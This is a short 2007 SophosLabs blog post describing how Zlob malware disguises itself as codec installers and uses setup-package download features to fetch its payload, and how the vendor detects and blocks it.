More Zlob activity
Many of the Zlob’s we see to date, attempt to trick the user into installing it by masquerading as one or more movie or audio codecs. Unsuspecting users may attempt to install these, in an attempt to get a video or song to play properly.
Most of the time the Zlob authors simply package their malicious code in a fake codec installer, that to many people would seem quite legitimate! This hasn’t always been effective since our virus engine is quite capable of detecting the malicious code, even packaged inside the installer. However a new technique is now being employed by the Zlob authors in an attempt to make their malware more adaptable and harder to detect, they are now taking advantage of some of the advanced functionality that is offered by modern Setup, or Install packages, such as NSIS, Wise and Installshield: the ability to install updated setup files directly off the internet.
These packages enable the malware authors to create an innocuous setup wizard for a dummy program, which then downloads the malware from a specified website automatically. Essentially the malware authors are using the setup wizards to download their malware for them!
Fortunately we can attack this on two fronts, we can detect the fake installers with our virus engine and block the download site with our WS1000 (and anti-spam products if necessary).
This renders this attack almost useless!
Posted on May 11th, 2007 by Chris Mitchell, SophosLabs Australia.Filed under: Uncategorized
Windows 7 security - A great leap forward or business as usual?
